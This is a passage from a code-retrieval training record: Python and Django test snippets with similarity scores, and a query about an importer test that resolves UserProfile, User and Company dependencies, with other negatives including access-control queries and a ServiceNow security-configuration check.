json.loads(rv.data.decode())['owner'] == 'Michael'", "def test_none_admin_delete(self):\n\n with self.client:\n token = self.customer()\n id = 1\n response = self.client.delete('api/v1/meals/{}'.format(id),\n headers=({\"token\": token}))\n data = json.loads(response.data.decode())\n self.assertEqual(data.get('message'),\n \"Customer is not authorized to access this page\")\n self.assertEqual(response.status_code, 401)", "def tearDown(self):\n Author.objects.all().delete()\n User.objects.all().delete()\n c.credentials()", "def test_groups_group_users_user_delete(self):\n pass", "def test_groups_group_users_user_delete(self):\n pass" ]
[ "0.6992192", "0.6501583", "0.63623047", "0.60247934", "0.5967793", "0.594195", "0.57997954", "0.57775795", "0.56826866", "0.56701046", "0.56604755", "0.5646488", "0.5642088", "0.5631375", "0.5626657", "0.55903274", "0.55903274", "0.5548128", "0.5526234", "0.5525164", "0.5518593", "0.5480383", "0.543759", "0.5418156", "0.5410556", "0.54056954", "0.53951174", "0.5382639", "0.5368453", "0.53489447", "0.53489447", "0.53395593", "0.53376395", "0.53363174", "0.53342974", "0.53177756", "0.53163344", "0.53150976", "0.5303231", "0.5300517", "0.5277335", "0.5259433", "0.52510804", "0.5249687", "0.5238578", "0.52383006", "0.5237136", "0.5232436", "0.5222647", "0.52123356", "0.51973385", "0.51964134", "0.51864654", "0.5183507", "0.5169601", "0.51695174", "0.5167181", "0.51669943", "0.51662135", "0.5160411", "0.5153488", "0.5146139", "0.51427037", "0.5141046", "0.5139996", "0.51286566", "0.5128542", "0.51279074", "0.5127647", "0.51239836", "0.51081574", "0.51081574", "0.50965285", "0.50962585", "0.50960207", "0.50944", "0.50936186", "0.5089757", "0.5088526", "0.5085417", "0.5084085", "0.5079246", "0.50779796", "0.5063574", "0.505849", "0.50541073", "0.5053974", "0.5052906", "0.5043338", "0.5033263", "0.5031729", "0.50298953", "0.50269496", "0.5024519", "0.50176185", "0.5016865", "0.5012964", "0.50073534", "0.50048596", "0.50048596" ]
0.6286618
3
Ensures any object with an analagous dependency relationship to UserProfile > User && UserProfile > Company can filter based on it's related import kvs
def test_dependent_object_import(self): # Initialize Importers up_manager = ImporterManager(importer=UserProfileImporter()) company_manger = ImporterManager(importer=CompanyImporter()) user_manager = ImporterManager(importer=UserImporter()) # Populate leaf models of dependency tree with kv data for row,name in enumerate(self.usernames): user_manager.update_kvs(field_name='username', value=name, row=row) company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row) #: Retrieve data associated with kv data user_manager.get_available_rows() company_manger.get_available_rows() #: Populate data up the dependency tree with retrieved rows for row in range(self.n_objs): up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row) up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row) #: Retrieve data associated with models depended upon up_manager.get_available_rows() #: Test corresponding UserProfile has been returned for row in range(self.n_objs): objs = up_manager.get_objs_and_meta(row) #: Returns a list of objects only if manytomany, o/w just 1 self.assertEqual(objs[0].available, True) self.assertIsNotNone(objs[0].object) self.assertIsInstance(objs[0].object, UserProfile) self.assertIsNotNone(objs[0].query) self.assertEqual(objs[0].object.user.username, self.usernames[row])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_twice_dependent_object_import(self):\n pass", "def test_partial_twice_dependent_object_import(self):\n pass", "def test_m2m_dependent_object_import_precision(self): #: TODO: Come up with a better name\n other_company = Company.objects.create(name='Other Co', natural_id='oc')\n _,other_user_profile = create_base_models(username='other', company=other_company)\n\n #: Create same named tags <-- assert later that they do not get filtered out as they are from a different\n #: company\n blue = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='blue',\n slug='blue',\n rank=0\n )\n green = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='green',\n slug='green',\n rank=2\n )\n\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n #: Anyway to avoid pushing these redundant kvs accross a row (??)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n self.assertEqual(len(tag_manager.get_object_or_list(0)), 2)\n for tag in tag_manager.get_object_or_list(0):\n self.assertEqual(tag.company_id, self.company.id)\n self.assertNotEqual(tag.company_id, other_company.id)\n\n self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)", "def test_nondependent_object_get(self):\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_partial_nondependent_object_get(self):\n MISSING_INDEX = 2\n User.objects.filter(username=self.usernames[MISSING_INDEX]).delete()\n\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n if i==MISSING_INDEX:\n self.assertEqual(objs[0].available, False)\n self.assertIsNone(objs[0].object)\n self.assertIsNotNone(objs[0].query)\n continue\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def related_view_filter():\n pass", "def test_list_dependent_assets2(self):\n pass", "def test_list_dependent_assets1(self):\n pass", "def test_list_dependent_assets(self):\n pass", "def test_list_dependent_assets3(self):\n pass", "def _check_cross_project_references(self, own_project_id,\r\n visibility_field):\r\n def check_project_id(subfilter):\r\n op = subfilter.keys()[0]\r\n if (op.lower() not in self.complex_operators\r\n and subfilter[op].keys()[0] == visibility_field\r\n and subfilter[op][visibility_field] != own_project_id):\r\n raise ProjectNotAuthorized(subfilter[op][visibility_field])\r\n\r\n self._traverse_postorder(self.filter_expr, check_project_id)", "def filter_installed(self, queryset, name, value):\n if str2bool(value):\n return queryset.exclude(belongs_to=None)\n else:\n return queryset.filter(belongs_to=None)", "def restrict_objects(self):\n if self.data_local and self.restrict_method_id:\n model = self.inventory_model.model\n global_vars = self.env['gdpr.restrict_method'].get_eval_context(restrict_days=self.restrict_time_days)\n if self.restrict_domain_advanced:\n eval(compile(self.restrict_domain_code, __name__, 'exec'), global_vars)\n domain = safe_eval(self.restrict_domain, global_vars)\n object_ids = [o['id'] for o in self.env[model].search_read(domain, ['id'])]\n _logger.debug('restrict_objects object_ids: %s' % object_ids)\n domain = [('restricted', '!=', True), ('gdpr_id', '=', self.id), ('object_res_id', 'in', object_ids)]\n if self.lawsection_id.consent:\n gdpr_o_ids = [o['gdpr_object_id'][0] for o in self.env['gdpr.consent'].search_read([('state', '=', 'withdrawn'), ('record_id', 'in', [('%s,%s' % (model, id)) for id in object_ids]), ('gdpr_id', '=', self.id)], ['gdpr_object_id'])]\n domain.append(('id', 'in', gdpr_o_ids))\n _logger.debug('restrict_objects domain: %s' % domain)\n objects = self.env['gdpr.object'].search(domain)\n if objects:\n self.restrict_method_id.restrict_objects(self, objects)", "def allow_relation(self, obj1, obj2, **hints):\n\n result = False\n if not (obj1._meta.model_name in GeoSpatialRouting.includedModels and \n obj2._meta.model_name in GeoSpatialRouting.includedModels) :\n result = None\n return result", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def test_get_ancestors_requirements(self):\n pass", "def _check_criteria(dep, dep_obj, all_related, edge, sibling_idx):\n # Check for a matching dependency type\n related = []\n\n if edge[2][\"dep\"] == dep:\n # Check for matching POS type(s)\n for pos_logic in dep_obj.keys():\n connector = None\n\n if isinstance(dep_obj[pos_logic], dict):\n for pos in dep_obj[pos_logic].keys():\n\n # Check for allowed part of speech tags in matched dependency patterns\n if (pos_logic == \"pos_in\" and pos in G.nodes[sibling_idx][\"pos\"]) or (\n pos_logic == \"pos_equals\" and pos == G.nodes[sibling_idx][\"pos\"]):\n pass\n elif pos_logic == \"pos_not\":\n if not [False if not_pos == G.nodes[sibling_idx][\"pos\"] else True for not_pos in\n dep_obj.keys()]: continue\n else:\n continue\n\n # if no additional checks, have a match\n if dep_obj[pos_logic][pos] == None or any(\n y in dep_obj[pos_logic][pos] for y in [None, \"add_sibling\"]):\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']])\n\n # if additional checks are required, process further\n if dep_obj[pos_logic][pos]:\n if \"get_cousin\" in dep_obj[pos_logic][pos]:\n related.extend(_get_cousin(sibling_idx, dep_obj[pos_logic][pos][\"get_cousin\"]))\n connector = G.nodes[sibling_idx]['word']\n\n if \"special\" in dep_obj[pos_logic][pos]:\n if dep == \"compound\" and pos == \"NN\":\n related = [G.nodes[sibling_idx]['word']]\n\n if None in related:\n related.remove(None)\n\n # Allows for getting cousin and returning sibling\n if \"else\" in dep_obj[pos_logic][pos].keys() and dep_obj[pos_logic][pos][\"else\"] == \"always\":\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']], connector=connector)\n if len(related) > 0 and isinstance(related, list):\n for x in related:\n if x != None:\n all_related = _add_related(x, dep, all_related, A.index_lookup[x],\n connector=connector)\n elif \"else\" in dep_obj[pos_logic][pos].keys() and dep_obj[pos_logic][pos][\"else\"] == True:\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']], connector=connector)\n\n return all_related", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def queryset(self, request):\n qs = super(ChildAdmin, self).queryset(request)\n if request.user.is_superuser:\n \treturn qs\n if request.user.user_category == 'block':\n \treturn qs.filter(block=request.user.account.associated_with)\n if request.user.user_category == 'school':\n \treturn qs.filter(school=request.user.account.associated_with)\n if request.user.user_category == 'district':\n \treturn qs.filter(district=request.user.account.associated_with)\n # Register your models here.", "def test_coupledmodels_get(self):\n pass", "def set_restriction_filters(self):\n self.restriction_filters[\"pk__exact\"] = self.request.user.pk", "def compare_thresholded_data_with_models(self):\n pass", "def _check_excluded_propmodels(\n part_model: \"Part\", property_models: List[\"AnyProperty\"]\n) -> List[\"AnyProperty\"]:\n from pykechain.models import Part, Property\n\n if not part_model:\n # part model is unknown, only check for property_models\n return [check_base(pm, Property, \"property_model\") for pm in property_models]\n\n if not isinstance(part_model, Part):\n raise IllegalArgumentError(\n f'`part_model` must be a Part object, \"{part_model}\" is not.'\n )\n\n list_of_propmodels_excl: List[\"AnyProperty\"] = list()\n for property_model in property_models:\n if is_uuid(property_model):\n property_model = part_model.property(property_model)\n elif not isinstance(property_model, Property):\n raise IllegalArgumentError(\n \"A part reference property can only exclude `Property` models or their UUIDs, \"\n 'found type \"{}\"'.format(type(property_model))\n )\n\n if property_model.category != Category.MODEL:\n raise IllegalArgumentError(\n \"A part reference property can only exclude `Property` models, found \"\n 'category \"{}\" on property \"{}\"'.format(\n property_model.category, property_model.name\n )\n )\n elif part_model.id != property_model.part_id:\n raise IllegalArgumentError(\n \"A part reference property can only exclude properties belonging to the referenced\"\n ' Part model, found referenced Part model \"{}\" and Properties belonging to \"{}\"'.format(\n part_model.name, property_model.part.name\n )\n )\n else:\n list_of_propmodels_excl.append(property_model.id)\n return list_of_propmodels_excl", "def _fillSecurityInRelatedEntities(self, input_template):\n\n if not input_template.definition is None and \"columns\" in input_template.definition:\n for column in input_template.definition[\"columns\"]:\n if column[\"type\"] in [\"dropdown\", \"remoteDropdown\"]:\n related_input_template = InputTemplate.objects.get(code=column[\"entity\"])\n for related_column in related_input_template.definition[\"columns\"]:\n if related_column[\"type\"] == \"departmentSelector\":\n column[\"entityFilterByDepartment\"] = True\n break", "def test_list_filtering(self):\n # Test the \"all\" response.\n url = '/api/users/?all=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertContains(response, self.shared.email)\n # Test filtering by ad_deleted.\n url = '/api/users/?ad_deleted=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n url = '/api/users/?ad_deleted=false'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertNotContains(response, self.del_user.email)\n self.assertContains(response, self.user1.email)\n # Test filtering by email (should return only one object).\n url = '/api/users/?email={}'.format(self.user1.email)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by GUID (should return only one object).\n url = '/api/users/?ad_guid={}'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by cost centre (should return all, inc. inactive and contractors).\n url = '/api/users/?cost_centre={}'.format(self.cc2.code)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user2.email)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n self.assertNotContains(response, self.shared.email) # Belongs to CC1.\n # Test filtering by O365 licence status.\n self.user1.o365_licence = True\n self.user1.save()\n url = '/api/users/?o365_licence=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)", "def depends((a, b)):\r\n return (any(bout in a.inputs for bout in b.outputs)\r\n or any(depends((ainp.owner, b)) for ainp in a.inputs\r\n if ainp.owner))", "def test_model_can_import():\n assert hasattr(model, \"SEIR_model_publish_w_risk\")\n assert hasattr(model, \"compute_R0\")", "def assert_url_included_with_foreign_key(self, data, **kwargs):\n if \"user_id\" in data and \"user_url\" not in data:\n raise ValidationError(\"User ID was included, but User URL was not.\")\n if \"bike_id\" in data and \"bike_url\" not in data:\n raise ValidationError(\"Bike ID was included, but Bike URL was not.\")", "def assert_url_included_with_foreign_key(self, data, **kwargs):\n if \"user_id\" in data and \"user_url\" not in data:\n raise ValidationError(\"User ID was included, but User URL was not.\")\n if \"bike_id\" in data and \"bike_url\" not in data:\n raise ValidationError(\"Bike ID was included, but Bike URL was not.\")", "def check_access_rights(access_obj, thing):\n from apps.users.models import Dept, Subdept, Page\n if hasattr(thing, \"person\"): # Allow all user walls to be accessible by everyone\n return 1\n if isinstance(access_obj, User):\n erp_profile = access_obj.erp_profile\n erp_coords = erp_profile.coord_relations.all()\n erp_supercoords = erp_profile.supercoord_relations.all()\n erp_cores = erp_profile.core_relations.all()\n erp_pages = erp_profile.page_relations.all()\n \n # Have access to the thing directly\n id_query = Q(id=thing.id)\n my_query = ( \\\n Q(access_users__id__exact=access_obj.id) | \\\n Q(access_subdepts__in=erp_coords) | \\\n Q(access_depts__in=erp_supercoords) | \\\n Q(access_depts__in=erp_cores) | \\\n Q(access_pages__in=erp_pages)\n )\n if isinstance(thing, Post): \n # + Access to the wall of this post\n # + wall is directly related to me\n # + wall is related to all subdepts of my dept \n # + wall is related to all depts related to my subdepts\n my_query = my_query | \\\n Q(wall__access_users__id__exact=access_obj.id) | \\\n Q(wall__access_subdepts__in=erp_coords) | \\\n Q(wall__access_depts__in=erp_supercoords) | \\\n Q(wall__access_depts__in=erp_cores) | \\\n Q(wall__access_pages__in=erp_pages) | \\\n Q(wall__person=erp_profile) | \\\n Q(wall__subdept__in=erp_coords) | \\\n Q(wall__dept__in=erp_supercoords) | \\\n Q(wall__dept__in=erp_cores) | \\\n Q(wall__page__in=erp_pages) | \\\n Q(wall__subdept__dept__in=erp_supercoords) | \\\n Q(wall__subdept__dept__in=erp_cores) | \\\n Q(wall__dept__subdepts__in=erp_coords)\n my_query = my_query & id_query\n return Post.objects.filter(my_query).distinct().count()\n elif isinstance(thing, Wall):\n # + Directly related to the wall\n # + related to all subdepts of my dept \n # + related to all depts related to my subdepts\n my_query = my_query | \\\n Q(person=erp_profile) | \\\n Q(subdept__in=erp_coords) | \\\n Q(dept__in=erp_supercoords) | \\\n Q(dept__in=erp_cores) | \\\n Q(page__in=erp_pages) | \\\n Q(subdept__dept__in=erp_supercoords) | \\\n Q(subdept__dept__in=erp_cores) | \\\n Q(dept__subdepts__in=erp_coords)\n my_query = my_query & id_query\n return Wall.objects.filter(my_query).distinct().count()\n elif isinstance(access_obj, Subdept):\n return thing.access_subdepts.filter(id=access_obj.id).distinct().count()\n elif isinstance(access_obj, Dept):\n return thing.access_depts.filter(id=access_obj.id).distinct().count()\n elif isinstance(access_obj, Page):\n return thing.access_pages.filter(id=access_obj.id).distinct().count()", "def test_collect_classifier_dependencies_on_filter(self, module_repo):\n expected_result = {(\"CommonScripts\", True)}\n\n test_input = [\n {\n \"Dummy Classifier\": {\n \"name\": \"Dummy Classifier\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"filters\": [\"IsInCidrRanges\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_classifiers_dependencies(\n pack_classifiers=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def filter_by_model(self, instance):\n content_type = ContentType.objects.get_for_model(instance.__class__)\n object_id = instance.id\n queryset = super(UserTrackerManager, self).filter(\n content_type=content_type, object_id=object_id)\n return queryset", "def _check_conditional_dependency(obj, condition, package, severity, msg=None):\n if condition:\n if msg is None:\n msg = (\n f\"The specific parameter values of {obj.__class__.__name__}'s \"\n f\"class instance require `{package}` installed. Please run: \"\n f\"`pip install {package}` to \"\n f\"install the `{package}` package. \"\n )\n try:\n _check_soft_dependencies(package, severity=severity, obj=obj)\n except ModuleNotFoundError as e:\n raise ModuleNotFoundError(msg) from e", "def _filter_denies(self, filtered_ref):\n for deny in self.denies_:\n if not deny:\n continue\n\n for ref_key in filtered_ref.ref_keys(deny):\n del filtered_ref[ref_key]", "def get_referents(data):\n fakes_group = data.groups.get(\"Fakes\")\n\n return [obj for obj in data.groups[\"Referents\"].objects\n if not obj.hide_render or fakes_group in obj.users_group]", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(inquiry__bank=request.user.profile.bank)", "def allow_relation(self, obj1, obj2, **hints):\n if obj1._meta.app_label == 'data_collection' or \\\n obj2._meta.app_label == 'data_collection':\n return True\n return None", "def test_all_field_dependencies_model(self, all_field_dependencies):\n # Loop over the dependencies\n for dependency in all_field_dependencies:\n api_keys = dependency.keys()\n # Check if the number of keys is the same between the model and the API\n assert len(self.model_keys) == len(api_keys)\n # Check of the keys and types of values are the same between the model and the API\n for key in self.model_keys:\n assert key in api_keys\n assert type(dependency[key]) in field_dep_model[key]", "def validate_dependencies(self, session, entry):", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def servicenow_sspm_privacy_client_callable_script_includes_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str):\n iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()\n\n # Name of the property to evaluate against\n evalTarget = \"glide.script.ccsi.ispublic\"\n # Get cached props\n sysPropCache = get_servicenow_sys_properties(cache)\n\n # There should not ever be a duplicate system property, use next() and a list comprehension to check if the\n # property we're evaluating is in the list of properties we get from the cache. If it is NOT then set the\n # value as `False` and we can fill in fake values. Not having a property for security hardening is the same\n # as a failed finding with a lot less fan fair\n propFinder = next((sysprop for sysprop in sysPropCache if sysprop[\"name\"] == evalTarget), False)\n # If we cannot find the property set \"NOT_CONFIGURED\" which will fail whatever the value should be\n if propFinder == False:\n propertyValue = \"NOT_CONFIGURED\"\n propDescription = \"\"\n propId = \"\"\n propCreatedOn = \"\"\n propCreatedBy = \"\"\n propUpdatedOn = \"\"\n propUpdatedBy = \"\"\n propScope = \"\"\n assetB64 = None\n else:\n propertyValue = str(propFinder[\"value\"])\n propDescription = str(propFinder[\"description\"]).replace(\"\\n \", \"\")\n propId = str(propFinder[\"sys_id\"])\n propCreatedOn = str(propFinder[\"sys_created_on\"])\n propCreatedBy = str(propFinder[\"sys_created_by\"])\n propUpdatedOn = str(propFinder[\"sys_updated_on\"])\n propUpdatedBy = str(propFinder[\"sys_updated_by\"])\n propScope = str(propFinder[\"sys_scope\"][\"value\"])\n # B64 encode all of the details for the Asset\n assetJson = json.dumps(propFinder,default=str).encode(\"utf-8\")\n assetB64 = base64.b64encode(assetJson) \n # NOTE: This is where the check evaluation happens - in SNOW these may be Bools or Numbers but will come back as Strings\n # always evaluate a failing condition first which should be the OPPOSITE of the SNOW reccomendation as sometimes the values\n # are not a simple Boolean expression\n if propertyValue != \"false\":\n finding = {\n \"SchemaVersion\": \"2018-10-08\",\n \"Id\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"ProductArn\": f\"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default\",\n \"GeneratorId\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"AwsAccountId\": awsAccountId,\n \"Types\": [\"Software and Configuration Checks\"],\n \"FirstObservedAt\": iso8601Time,\n \"CreatedAt\": iso8601Time,\n \"UpdatedAt\": iso8601Time,\n \"Severity\": {\"Label\": \"HIGH\"},\n \"Confidence\": 99,\n \"Title\": \"[SSPM.Servicenow.AccessControl.16] Instance should enable privacy control over all client-callable script includes accessed by public pages\",\n \"Description\": f\"Servicenow instance {SNOW_INSTANCE_NAME} does not enable privacy control over all client-callable script includes accessed by public pages. By default, client-callable script includes that do not explicitly set visibility, are public. If needed, add the 'glide.script.ccsi.ispublic' property to enable privacy control over all client-callable script includes accessed by public pages. When you add this property, you must set its value to false, which designates that all client-callable script includes are private, and changes their visibility in public pages. If you do not add this property, client-side script includes circumvent ACLs, which may result in unintended public functionality. If the client script provides confidential information, it could have an adverse potential security risk. Refer to the remediation instructions if this configuration is not intended.\",\n \"Remediation\": {\n \"Recommendation\": {\n \"Text\": \"For more information refer to the Privacy on client-callable script includes (instance security hardening) section of the Servicenow Product Documentation.\",\n \"Url\": \"https://docs.servicenow.com/bundle/utah-platform-security/page/administer/security/reference/privacy-on-client-callable-script-includes.html\",\n }\n },\n \"ProductFields\": {\n \"ProductName\": \"ElectricEye\",\n \"Provider\": \"ServiceNow\",\n \"ProviderType\": \"SaaS\",\n \"ProviderAccountId\": SNOW_INSTANCE_NAME,\n \"AssetRegion\": SNOW_INSTANCE_REGION,\n \"AssetDetails\": assetB64,\n \"AssetClass\": \"Management & Governance\",\n \"AssetService\": \"System Properties\",\n \"AssetComponent\": \"System Property\"\n },\n \"Resources\": [\n {\n \"Type\": \"ServicenowInstance\",\n \"Id\": f\"{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}\",\n \"Partition\": awsPartition,\n \"Region\": awsRegion,\n \"Details\": {\n \"Other\": {\n \"ServicenowInstance\": SNOW_INSTANCE_NAME,\n \"SysId\": propId,\n \"PropertyName\": evalTarget,\n \"PropertyValue\": propertyValue,\n \"Description\": propDescription,\n \"CreatedBy\": propCreatedBy,\n \"CreatedOn\": propCreatedOn,\n \"UpdatedBy\": propUpdatedBy,\n \"UpdatedOn\": propUpdatedOn,\n \"Scope\": propScope\n }\n }\n }\n ],\n \"Compliance\": {\n \"Status\": \"FAILED\",\n \"RelatedRequirements\": [\n \"NIST CSF V1.1 PR.PT-3\",\n \"NIST SP 800-53 Rev. 4 AC-3\",\n \"NIST SP 800-53 Rev. 4 CM-7\",\n \"AICPA TSC CC6.1\",\n \"ISO 27001:2013 A.6.2.2\", \n \"ISO 27001:2013 A.9.1.2\",\n \"ISO 27001:2013 A.9.4.1\",\n \"ISO 27001:2013 A.9.4.4\",\n \"ISO 27001:2013 A.9.4.5\",\n \"ISO 27001:2013 A.13.1.1\",\n \"ISO 27001:2013 A.14.1.2\",\n \"ISO 27001:2013 A.14.1.3\",\n \"ISO 27001:2013 A.18.1.3\"\n ]\n },\n \"Workflow\": {\"Status\": \"NEW\"},\n \"RecordState\": \"ACTIVE\"\n }\n yield finding\n else:\n finding = {\n \"SchemaVersion\": \"2018-10-08\",\n \"Id\": f\"servicenow/{SNOW_INSTANCE_NAME}/sys_properties/{evalTarget}/check\",\n \"ProductArn\": f\"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default\",\n \"GeneratorId\": 